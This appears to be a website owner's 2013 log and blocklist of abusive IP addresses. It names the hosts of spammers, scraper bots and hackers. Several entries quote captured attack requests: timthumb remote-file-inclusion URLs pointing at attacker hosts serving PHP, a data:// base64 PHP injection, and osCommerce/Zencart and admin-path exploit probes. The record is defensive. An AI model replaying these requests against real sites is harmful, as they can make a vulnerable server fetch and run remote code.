/137501636951f515b145ae8.php
/137501636551f515add822d.php
198.2.203.16 Host: China Guangzhou Lcc
PEGTECHINC – PEG TECH INC
Comment spammer
Bad host
189.186.210.208 Hostname: dsl-189-186-210-208-dyn.prod-infinitum.com.mx
Host: Mexico – Mexico City Gestion De Direccionamiento Uninet
Comment spammer
208.177.76.15 Hostname: 208.177.76.15.ptr.us.xo.net
Host: United States – Herndon Xo Communications
Comment spammer
Bad host
94.27.95.129 Hostname: SOL-FTTB.129.95.27.94.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment spammer
59.42.47.43 Host: China – Guangzhou No.17 Jiao Chang Xi Road Guangzhou China
Web server: 1 website – zyaj168.com
Comment spammer
192.119.151.155 Host: United States – Dallas Avante Vps Comment spammer
Hijacked browser UA: Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)
86.169.159.173 Hostname: host86-169-159-173.range86-169.btcentralplus.com
Host: United Kingdom – Manchester Bt Public Internet Service
Comment spammer
Mail server
88.216.112.67 Hostname: 173-231-10-35.hosted.static.webnx.com
Host: Lithuania – Vilnius Uab Nacionalinis Telekomunikaciju Tinklas
Shared hosting server: 30 websites
Hacker – Looking for database backups –
/admin/backup/
/backup/
/backups/
192.99.2.63 Hostname: ns4009078.ip-192-99-2.net
Host: Canada – Montreal Ovh Hosting Inc.
Comment spammer
Looking for indexes – index.php
Bad host: Montreal OVH
82.193.120.55 Hostname: 82.193.120.55.ipnet.kiev.ua
Host: Ukraine – Kiev Zat Industrial Media Network
Comment spammer
Bad host
181.48.27.242 Host: Colombia – Bogota Telmex Colombia S.a. Remote File Inclusion probe / WordPress timthumb RFI exploit:
/wp-content/themes/patientpuptraining/thumb.php?
src=http: //picasa.com.kakaespetos.com.br/bad.php
89.72.218.213 Hostname: 89-72-218-213.dynamic.chello.pl
Host: Poland – Warsaw Upc Polska Sp. Z O.o.
Looking for wp-signup
Suspicious UA: Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0 2013-07-27 07:37:08
That’s not any browser agent I know of.
192.3.141.125 Hostname: host.colocrossing.com
Host: United States – Buffalo Colocrossing
Brute force exploit attempt looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
63.235.155.210 Hostname: 63-235-155-210.dia.static.qwest.net
Host: United States – San Mateo Terarecon Inc.
Trying to register
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
190.204.106.61 Hostname: host6.server11.vpn999.com
Host: Venezuela, Bolivarian Republic Of – Caracas Cantv Servicios Venezuela
Comment spammer
96.127.166.83 Hostname: host6.server11.vpn999.com
Host: United States – Chicago Singlehop Inc.
Web server: 1 website – bookssquad.com
Comment spammer
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
Bad host: Chicago Singlehop
39.189.4.106 Host: China – Beijing China Mobile Communications Corporation Comment spammer
83.146.71.64 Host: Russian Federation – Chelyabinsk Southern Urals Transtelecom Zao Comment spammer
142.0.34.166 Host: United States – Scranton Volumedrive Comment spammer
Trying to post content – node/add
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
173.231.10.35 Hostname: 173-231-10-35.hosted.static.webnx.com
Host: United States – Los Angeles Webnx Inc
Shared hosting server: 1998 websites
Looking for exploit vulnerability
208.73.23.78 United States – Baltimore Reliable Hosting Services Hacker looking for vulnerable files:
/wp-content/plugins/wp_api/mod_system.php
185.8.22.235 Hostname: 53.hosted.kode.ro
Host: Russian Federation – Stavropol’ Ooo Set
Looking for known Apache .svn directory vulnerability
/.svn/text-base/index.php.svn-base
74.221.217.130 Host: United States – Seattle Dme Hosting Llc Comment spammer
Trying to register: /?q=user
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
Hijacked browser UA:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET
CLR 1.1.4322; PeoplePal 6.2)
79.5.54.133 Hostname: host133-54-static.5-79-b.business.telecomitalia.it
Host: Italy – Roma Telecom Italia Net
Trying to access site admin
/admin.php
/wp-login.php
/administrator/index.php
Trying to register
/?q=user
85.204.235.53 Hostname: 53.hosted.kode.ro
Host: Romania – Bucharest Sc Mediasat Srl
Comment spammer
Trying to register
91.220.43.21 Hostname: SOL-FTTB.232.74.27.94.sovam.net.ua
Host: Latvia – Riga Energy.lv Sia
Looking for wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
/admin/administrators.php/login.php
94.27.74.232 Hostname: SOL-FTTB.232.74.27.94.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment spammer
Bad host
88.190.240.66 Hostname: 88-190-240-66.rev.dedibox.fr
Host: France – Nantes Free Sas
Comment spammer
88.190.241.111 Hostname: 88-190-241-111.rev.dedibox.fr
Host: France – Nantes Free Sas
Comment spammer
94.23.118.179 Host: Italy – Trieste Ovh Systems Comment spammer
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
2nd UA seen contains hijacked Browser UA string: “FunWebProducts”
66.248.193.125 Host: United States – Dallas Toby Pillinger Comment spammer
88.190.241.38 Hostname: 88-190-241-38.rev.dedibox.fr
Host: France – Nantes Free Sas
Comment spammer
Bad host
193.111.141.52 Hostname: t052.topaz.fastwebserver.de
Host: Germany – Dusseldorf Interprovider Ltd
Rule breaker – ignores robots.txt
Malicious user agent – MJ12bot
Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http: //www.majestic12.co.uk/bot.php?+)
87.68.68.58 Hostname: 87.68.68.58.cable.012.net.il
Host: Israel – Tel Aviv 012 Smile Communications Ltd.
Mail server
multiple requests from same URL with 4 different user agents
Honeypot records show IP belongs to bad host
94.228.34.203 Host: United Kingdom – Byfleet 4d Data Centres Ltd Spy bot – magpie-crawler
UA: magpie-crawler/1.1 (U; Linux amd64; en-GB;
+http: //www.brandwatch.net)
88.190.241.198
88.190.241.178
Hostname: 88-190-241-198.rev.dedibox.fr
Host: France – Nantes Free Sas
Comment spammer
Bad host
65.49.14.148 Host: United States – Cheyenne Sophidea Inc. Comment spammer
198.167.136.247 Host: United States – Kansas City Dnsslave.com Comment spammer
94.27.94.170 Hostname: SOL-FTTB.170.94.27.94.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment spammer
Bad host
137.175.68.177 Host: United States – Sunnyvale Peg Tech Inc Comment spammer
Bad host
212.109.32.11 Hostname: SOL-FTTB.217.65.27.94.sovam.net.ua
Host: Ukraine – Kiev Corenet: Staff Subnet
Shared hosting server: 75 websites
Comment spammer
198.204.226.194 Comment spammer
Bad host
119.205.213.20 Host: Korea, Republic Of – Seoul Korea Telecom Looking for Joomla JCE editor Remote file inclusion (RFI) exploit vulnerability
/&sa=&ei=kvjvUcCABIK44ASLz4HgDA&ved=0CJJCwYBE2%AIpma6C3Busg=
AFQjCNH1NynPtLfaBhB-zygfCyIBwmMC-Q/images/stories/3xp.php
67.202.113.168 Hostname: ip168.67-202-113.static.steadfastdns.net
Host: United States – Chicago Steadfast Networks
Comment spammer
tried to add new content item
/node/add
208.177.72.32 Hostname: 208.177.72.32.ptr.us.xo.net
Host: United States – Herndon Xo Communications
Comment spammer
Bad host
94.27.65.217 Hostname: SOL-FTTB.217.65.27.94.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment spammer
192.157.201.10 Hostname: 10.201-157-192.rdns.scalabledns.com
Host: United States – Los Angeles Enzu Inc
Comment spammer
193.28.178.61 Host: United Kingdom – Hamilton Ebay Inc. Hackerbot – Probing for Magento scripts
/js/mage/cookies.js
85.214.151.120 Hostname: h1905547.stratoserver.net
Host: Germany – Berlin Strato Ag
Shared hosting server: 74 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/Quadro/timthumb.php?src=http
%3A%2F%2Fflickr.com.mehtermarsi.org%2Fjhr.php
72.3.236.86 Hostname: s89196.seo-cms.com
Host: United States – Dallas Rackspace Host Routes
Shared hosting server: 9 websites
Looking for wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
92.105.141.171 Hostname: 171-141.105-92.cust.bluewin.ch
Host: Switzerland – Zurich Bluewin Is An Lir And Isp In Switzerland.
Comment spammer
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
58.17.213.60 Host: China – Chongqing China Unicom Chongqing Province Network Comment Spammer
94.27.82.174 Hostname: SOL-FTTB.174.82.27.94.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment Spammer
92.162.153.159 Hostname: AToulouse-556-1-169-159.w92-162.abo.wanadoo.fr
Host: France – Toulouse France Telecom S.a.
Rule breaker
Tried to crawl several hundred pages – adding non-existent terms to URL
68.68.96.128 Host: United States – Fremont Active Media Comment Spammer
172.245.32.136 Hostname: host.colocrossing.com
Host: United States – Elk Grove Village New Wave Netconnect Llc
Trying to create account
/?q=user/register – Repetitive attempts
50.115.171.41 Host: United States – Sunnyvale Peg Tech Inc Trying to create account
/?q=user/register – Repetitive attempts
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
188.163.5.0 Hostname: SOL-FTTB.0.5.163.188.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Unidentified bot – read robots.txt then proceeded to crawl disallowed files
UA: Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2
137.175.118.97 Host: United States – Sunnyvale Peg Tech Inc
PEGTECHINC – PEG TECH INC
Comment Spammer
Found honeypot trap file
58.49.30.118 Hostname: 118.30.49.58.broad.wh.hb.dynamic.163data.com.cn
Host: China – Wuhan Chinanet Hubei Province Network
Brute force / dictionary attack looking for known vulnerable registration scripts
/tiki-register.php
Filled up 1000 entries in activity log in 5 minutes
85.114.136.138 Hostname: web.dawn-server.de
Host: Germany – Koeln Sk-gaming Via Gamed.de Gameserver
Shared hosting web server – 204 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
188.163.5.146 Hostname: SOL-FTTB.146.5.163.188.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment Spammer
188.163.13.209 Hostname: SOL-FTTB.209.13.163.188.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment Spammer
184.72.6.38 Hostname: ec2-184-72-6-38.us-west-1.compute.amazonaws.com
Host: United States – San Francisco Amazon Technologies Inc.
Rule breaker – ignores robots.txt
Nuisance bot: UnwindFetchor/1.0
User Agent: UnwindFetchor/1.0 (+http: //www.gnip.com/)
74.112.131.242
74.112.131.244
Hostname: cc002.topsy.com
Company: United States – San Francisco Topsy Labs Inc.
Butterfly/1.0 bot. This is not a valid search engine spider
User Agent: Mozilla/5.0 (compatible; Butterfly/1.0; +http: //labs.topsy.com/butterfly/) Gecko/2009032608 Firefox/3.0.8
54.241.198.78 Hostname: ec2-54-241-198-78.us-west-1.compute.amazonaws.com
Host: United States – San Francisco Amazon Technologies Inc.
Rule breaker – ignores robots.txt
Nuisance bot: UnwindFetchor/1.0
User Agent: UnwindFetchor/1.0 (+http: //www.gnip.com/)
94.27.67.20 Hostname: SOL-FTTB.20.67.27.94.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment Spammer
85.25.134.59 Hostname: bravo952.startdedicated.com
Host: Germany – Hurth Intergenia Ag
Banned User agent –
NCBot (http: //netcomber.com : tool for finding true domain owners) Queries/complaints: bot@netcomber.com
Listed as mail server and comment spammer
106.81.22.8 Host: China – Chongqing Chinanet Chongqing Province Network Hotlinker – using resources to serve images embedded.
94.102.9.79 Hostname: falcon893.startdedicated.com
Host: Turkey – Izmir Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti.
Shared hosting web server – 5 websites
Hacker:
Probing for exploit vulnerabilities:
//wp-includes/wp-script.php
//wp-includes/wp-services.php
//wp-includes/class-wp-customize-client.php
//thumb_editor.php
//logx.txt
//wp-includes/jahat.php
//wp-content/uploads/images.php
199.217.117.52 Hostname: falcon893.startdedicated.com
Host: United States – New York City Hosting Solutions International Inc.
Shared hosting web server – 73 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/patientpuptraining/thumb.php?src=http%3A%2F%2Fpicasa.com.restorationcontractors.ca%2Fprolink.php
89.39.174.13 Hostname: cpanel1.thinkmedia.ro
Host: Romania – Bucharest Sc Ava Telecom International Srl
Shared hosting web server – 22 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
198.56.193.74 Hostname: 74.193-56-198.rdns.scalabledns.com
Host: United States – Los Angeles Enzu Inc
Comment Spammer
188.163.4.157 Hostname: SOL-FTTB.157.4.163.188.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment Spammer
173.232.7.116 Host: United States – Kirkland Cybergate Web Solutions Comment Spammer
68.68.96.11 Host: United States – Fremont Active Media Comment Spammer
23.22.200.190 Hostname: ec2-23-22-200-190.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Comment Spammer
198.204.226.210 Host: United States – Kansas City Zhou Pizhong Comment Spammer
Bad host
137.175.1.235 United States – Sunnyvale Peg Tech Inc
PEGTECHINC – PEG TECH INC
Comment Spammer
Bad host
62.87.191.89 Hostname: dynamic-62-87-191-89.ssp.dialog.net.pl
Host: Poland – Wroclaw Dynamic Broadband Services
Comment Spammer
Bad host
50.115.173.24 Company: United States – Kansas City Dnsslave.com
VIRPUS – DNSSLAVE.COM
Comment Spammer
188.163.14.5 Hostname: SOL-FTTB.5.14.163.188.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment Spammer
192.74.232.129 Company: United States – San Jose Jiusutechnology Limited Liability Company
PEGTECHINC – PEG TECH INC
Comment Spammer
Bad host
94.27.77.240 Hostname: SOL-FTTB.240.77.27.94.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment Spammer
188.163.10.106 Hostname: SOL-FTTB.106.10.163.188.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment Spammer
37.1.251.117 Hostname: rev-117-251-20.isp3.alsatis.net
Company: France – Ramonville-saint-agne Sas Alsatis
Some sort of badly scripted bot.
Looked for several hundred pages using badly formed links
190.248.139.18 Hostname: cable190-248-139-18.une.net.co
Company: Colombia – Medellin Epm Telecomunicaciones S.a. E.s.p.
Web server – 1 website – contraloriadecundinamarca.gov.co
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/%20/timthumb.php?src=http
%3A%2F%2Fflickr.com.5paie.com%2Fstunx.php
198.74.231.14 Hostname: host388.hostmonster.com
Company: United States – Provo Unified Layer
Shared hosting web server – 1416 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/headlines/thumb.php?src=http:
//flickr.com.golfpops.com/good.php
/&sa=U&ei=oUvqUeHLBIXAigL6vICgCQ&ved=
0CCIQFjAC&usg=AFQjCNGCBxNGO5UOCJredTHWtzRmds5HBA
/wp-content/themes/headlines/thumb.php?src=http:
//flickr.com.golfpops.com/good.php
Probably a hacked website
198.74.231.14 Company: United States – Halethorpe Commercial Media Corporation Malicious user agent – MJ12bot
Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http: //www.majestic12.co.uk/bot.php?+)
95.181.60.106 Host: Russian Federation – Kemerovo E-light-telecom Base 64 hacker attack
DOMAIN ROOT /?_SERVER[DOCUMENT_ROOT]=data://text/plain;base64,U0hFTExfTU9KTk9fUFJPQk9WQVRK?
User agent:
Mozilla/4.0 (compatible; Synapse)
50.115.173.137 Company: United States – Kansas City Alexe Marian-marius Comment Spammer
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
207.34.25.76 Hostname: relay0.radian6.com
Host: Canada – Halifax Fast Lane Technologies
Spybot, webscraper
Rule breaker – never gets robots.txt
UA: R6_FeedFetcher(www.radian6.com/crawler)
37.18.152.166 Hostname: SOL-FTTB.77.66.27.94.sovam.net.ua
Host: Russian Federation – Stavropol’ Ooo Set Network
Looking for vulnerabilities
DOMAIN/.svn/text-base/index.php.svn-base
216.244.85.235 Company: United States – Seattle Private Customer Comment Spammer
94.27.66.77 Hostname: SOL-FTTB.77.66.27.94.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment Spammer
192.95.18.117 Company: United States – Newark Ovh Comment Spammer
188.163.15.103 Hostname: SOL-FTTB.103.15.163.188.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment Spammer
142.91.79.28 Hostname: 142.91.79.28.rdns.ubiquity.io
Company: United States – Los Angeles Ubiquity Server Solutions Los Angeles
Comment Spammer
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
89.70.240.251 Hostname: 89-70-240-251.dynamic.chello.pl
Host: Poland – Warsaw Upc Polska Sp. Z O.o.
Comment Spammer
94.23.118.176 Host: Italy – Trieste Ovh Systems Trying to login/register
Trackback spammer
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
94.27.66.203 Host: Ukraine – Kiev Golden Telecom Comment Spammer
88.170.8.1 Hostname: vif38-1-88-170-8-1.fbx.proxad.net
Host: France – Vif Free Sas
Rogue bot
Crawled site – looking for very old links
62.122.240.204 Hostname: ip-62.122.240.204.zelenaya.net
Host: Russian Federation – Saint Petersburg Ooo Set
Looking for vulnerabilities
DOMAIN/.svn/text-base/index.php.svn-base
116.1.103.246 Host: China – Nanning Chinanet Guangxi Province Network Comment Spammer
216.244.78.26 Host: United States – Seattle Mattarsoft.com.sa Comment Spammer
94.27.70.61 Hostname: SOL-FTTB.61.70.27.94.sovam.net.ua
Host: Ukraine – Gnedin Golden Telecom
Comment Spammer
65.254.53.238 Hostname: clone.powercode.com
Host: United States – Atlanta Global Net Access Llc
Web server – 14 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
Specifically looking for wpOnlineStore installations
108.62.71.154 Hostname: static-108-62-71-154.nextroute.co
Host: United States – Chicago Ubiquity Server Solutions Chicago
Comment Spammer
81.169.136.87 Hostname: h1648772.stratoserver.net
Host: Germany – Berlin Strato Ag
Web server – 1 website: brookpacelascelles.de
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
199.187.122.9 Host: United States – Philadelphia Mystik Media
Web server – 1 website: sheerexplorer.com
Malicious bot. Has several user agents – including faked googlebot ID
Scans site at high rate. Seems to get URLs from old archives and RSS feeds
Throws in registration urls e.g. /signup?context=webintent
Host – Mystik Media – considered malicious and all IPs banned
78.177.37.126 Hostname: 78.177.37.126.dynamic.ttnet.com.tr
Host: Turkey – Bursa Turk Telekomunikasyon Anonim Sirketi
Hacker – trying to login / access site admin
/wp-login.php
/administrator/index.php
/admin.php
/bitrix/admin/index.php?lang=en
/admin/login.php
/admin/
98.100.226.10 Host: United States – Green Bay Time Warner Cable Internet Llc Ezine Scanner bot
Bot never gets robots.txt
UA Mozilla/5.0 (textmode; U; Linux i386; en-US; rv:3.0.110.0) Gecko/20101006 EzineArticlesLinkScanner/3.0.0g
89.31.73.1 Host: Italy – Florence Genesys Informatica Srl Rogue bot – Rule breaker.
Never read robots.txt
Crawled entire site at high rate
59.57.14.116
59.57.14.92
Host: China – Fuzhou Chinanet Fujian Province Network Comment Spammer – found honeypot trap file
184.173.128.207 Hostname: 184.173.128.207-static.reverse.softlayer.com
Host: United States – Washington Theplanet.com Internet Services Inc.
Web server – 2 websites: quickmobile.com.br , yasaminkiyisinda.com
Looking for non-existent files
80.241.220.245 Hostname: vps2p.blooweb.net
Host: Germany – Muenchen Contabo Gmbh
Web server – 13 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
59.60.115.224 Host: Korea, Republic Of – Seoul Lg Dacom Kidc Comment Spammer
110.45.145.214 Host: China – Fuzhou Chinanet Fujian Province Network Hacker:
1. Remote PHP file inclusion attempt.
//wp-content//themes/freely/admin/extensions/timthumb.php?src=http:
//przemeksaracen.pl/load.php
2. Probing for various exploit vulnerabilities:
//wp-includes/wp-script.php
//wp-includes/wp-services.php
//wp-includes/class-wp-customize-client.php
//thumb_editor.php
//logx.txt
//wp-includes/jahat.php
//wp-content/uploads/images.php
108.62.71.63 Hostname: static-108-62-71-63.nextroute.co
Host: United States – Chicago Ubiquity Server Solutions Chicago
Nobis Technology Group, LLC
Trying to register/login
Direct access – No other page loaded
139.194.54.39 Hostname: fm-dyn-139-194-54-39.fast.net.id
Host: Indonesia – Jakarta Pt. First Media Tbk
Comment Spammer
94.27.69.95 Hostname: SOL-FTTB.95.69.27.94.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment Spammer
94.27.71.95 Hostname: SOL-FTTB.95.71.27.94.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment Spammer
94.27.68.174 Hostname: www11363ue.sakura.ne.jp
Host: Ukraine – Gnedin Golden Telecom
Comment Spammer
78.97.222.201 Host: Romania – Bucharest Upc Romania Cluj Comment Spammer, dictionary attacker, mail server
49.212.149.137 Hostname: www11363ue.sakura.ne.jp
Host: Japan – Tokyo Sakura Internet Inc.
Web server – 1 website: katsu757.net
Comment Spammer
85.195.121.2
85.195.124.182
Host: Germany – Hanau Am Main Velia.net Internetdienste Gmbh Comment Spammer
188.163.7.241 Hostname: SOL-FTTB.241.7.163.188.sovam.net.ua
Company: Ukraine – Kiev Golden Telecom
Comment Spammer
173.192.79.101 Hostname: 173.192.79.101-static.reverse.softlayer.com
Company: United States – Dallas Softlayer Technologies Inc.
Nuisance bot: ShowyouBot
User Agent: ShowyouBot (http: //showyou.com/crawler)
Grabs links from new Twitter posts – It’s not the Twitter bot – Ban it
Bad host – Softlayer Technologies
184.72.6.3 Hostname: ec2-184-72-6-38.us-west-1.compute.amazonaws.com
Company: United States – San Francisco Amazon.com Inc.
Nuisance bot: UnwindFetchor/1.0
User Agent: UnwindFetchor/1.0 (+http: //www.gnip.com/)
Grabs links from new Twitter posts – It’s not the Twitter bot – Ban it
74.112.131.246 Hostname: cc006.topsy.com
Company: United States – San Francisco Topsy Labs Inc.
Butterfly/1.0 bot. This is not a valid search engine spider
User Agent: Mozilla/5.0 (compatible; Butterfly/1.0; +http: //labs.topsy.com/butterfly/) Gecko/2009032608 Firefox/3.0.8
86.194.209.93 Hostname: AClermont-Ferrand-552-1-246-93.w86-194.abo.wanadoo.fr
Company: France – Clermont France Telecom S.a.
Suspicious user agent: rarely used
94.228.34.203 Company: United Kingdom – Byfleet 4d Data Centres Ltd Spybot – magpie-crawler – belongs to brandwatch.net
Rule breaker – ignores / never gets robots.txt
magpie-crawler/1.1 (U; Linux amd64; en-GB; +http: //www.brandwatch.net)
64.191.55.104 Hostname: sunlessn.dbloproject3.com
Company: United States – Scranton Network Operations Center Inc.
Web server – 1 website: pensjonat-delfin.com.pl
Trying to register account
93.74.42.136 Hostname: breakfastness.analogy.volia.net
Company: Ukraine – Kiev Kyivski Telekomunikatsiyni Merezhi Llc
Trying to register account
209.114.36.45 Hostname: 209-114-36-45.static.cloud-ips.com
Company: United States – Dallas Rackspace Hosting
Embed.ly Crawler
Commercial content scraper, rule breaker – ignore robots.txt
67.222.144.25 Hostname: ggs-t.ggs-t.com
Company: United States – Dallas Dfw Datacenter
Shared hosting server – 374 websites
Hacker activity – Remote PHP file inclusion attempt.
trying to exploit known phpProfiles vulnerability
DOMAIN/Full_Release/include/body_comm.inc.php?content=data:
,%3C?php%20print-439573653*57;%20?%3E
85.25.243.224 Hostname: puck361.server4you.de
Company: Germany – Berlin Intergenia Ag
Shared hosting server – 59 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/headlines/thumb.php?src=http %3A%2F%2Fwww. picasa.com.kennethholland.com%2F.log%2Fupload7.php
37.59.150.100 Company: France – Roubaix Ovh Systems Brute force / Dictionary attack attempt to register on site
Bad host – Roubaix Ovh
142.54.187.122 Company: United States – Kansas City Zhou Pizhong Brute force / Dictionary attack on forum signup/login using multiple common
login / signup paths
Bad host – Zhou Pizhong
173.234.196.251 Company: United States – Chicago Ubiquity Server Solutions Chicago
Web server – 1 website: zhoutang.com
Comment Spammer
Using a spambot hosted on this server
50.115.170.232 Company: United States – Kansas City Virpus Networks
Web server – 1 unidentified website
Comment Spammer
Using a spambot hosted on this server
173.212.224.84 Hostname: ns2.fast-cash4u.info
Company: United States – Las Vegas Pvnt Networks
Web server – 1 website: pointofnext.com
Comment Spammer
Using a spambot hosted on this server
83.152.212.105 Hostname: gov91-4-83-152-212-105.fbx.proxad.net
Company: France – Gargenville Online S.a.s.
Some sort of bot
Looked for existing content using faulty URLs
91.221.70.208 Hostname: server.semmant.ru
Company: Russian Federation – Moscow Averkiev Alexey Anatolyovich
Shared hosting server – 39 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
74.95.0.186 Hostname: loopip.com
Company: United States – San Francisco Comcast Business Communications Llc
Web server – 1 website: incywincy.com
Banned for adding > to end of URLs
142.0.32.6 Hostname: The.Easiest.The.Best.VPSInfinity.com
Company: United States – Scranton Volumedrive
Comment spammer
71.199.48.67 Hostname: c-71-199-48-67.hsd1.ut.comcast.net
Company: United States – Salt Lake City Comcast Cable Communications Ip Services
Comment spammer
162.211.121.206 Company: United States – Lewes Ilika.net Llc Comment spammer
88.80.20.197 Hostname: host-88-80-20-197.cust.prq.se
Company: Sweden – Stockholm Periquito Ab
Comment spammer
184.7.94.231 Hostname: fl-184-7-94-231.dhcp.embarqhsd.net
Company: United States – Fort Myers Embarq Corporation
Comment spammer
74.221.211.119 Company: United States – Seattle Dme Hosting Llc.
Website server: 1 website: howtocleancar.com
Comment spammer
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
88.190.16.36 Hostname: sd-28013.dedibox.fr
Company: France – Lyon Free Sas
Comment spammer
88.190.47.232 Hostname: 88-190-47-232.rev.dedibox.fr
Company: France – Lyon Free Sas
Comment spammer
88.190.61.98 Hostname: 88-190-61-98.rev.dedibox.fr
Company: France – Paris Free Sas
Comment spammer
88.190.61.96 Hostname: 88-190-61-96.rev.dedibox.fr
Company: France – Paris Free Sas
Comment spammer
49.212.149.137 Hostname: www11363ue.sakura.ne.jp
Company: Japan – Tokyo Sakura Internet Inc.
Website server: 1 website: katsu757.net
Comment spammer
98.126.218.88 Company: United States – Orange Krypt Technologies
Shared hosting server: 4 websites: 84i6.asia , 87jn.asia , 8aak.asia , 8jf8.asia
Comment spammer
198.2.203.5
198.2.203.12
Company: China – Guangzhou Lcc
PEGTECHINC – PEG TECH INC
Comment spammer, Bad host
199.48.254.170 Hostname: server5.nbtus.com
Company: United States Novi Vps Datacenter Llc
Shared hosting server: 63 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
URL&sa=U&ei=WwzdUbWLF9KCrQHsxIHwAg&ved=
0CJ8CEBYwUThk&usg=AFQjCNFTYwvFkHccfNBoBu8lQqHe7-
HB7g/admin/banner_manager.php/login.php
89.218.94.163 Company: Kazakhstan – Astana Ao Nacional Centr Mat Det Comment spammer
64.213.148.131 Company: United States – Broomfield Level 3 Communications Inc. Comment spammer
192.74.234.70 Company: United States – San Jose Feng Chen
PEGTECHINC – PEG TECH INC
Comment spammer
137.175.105.33 Company: United States – Columbus Xlhost.com Inc
PEGTECHINC – PEG TECH INC
Comment Spammer
207.182.144.38 Hostname: 26.90.b6.static.xlhost.com
Company: United States – Columbus Xlhost.com Inc
Comment Spammer
190.203.101.65 Hostname: 190-203-101-65.dyn.dsl.cantv.net
Company: Venezuela, Bolivarian Republic Of – Caracas Cantv Servicios Venezuela
Trying to login/register
216.244.85.234 Company: United States – Seattle Private Customer Comment Spammer
74.221.210.141 Company: United States – Scranton Volumedrive Comment Spammer
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02
Bork-edition [en]
85.195.99.198 Company: Germany – Hanau Am Main Velia.net Internetdienste Gmbh
Shared hosting server: 6 websites
Comment spammer
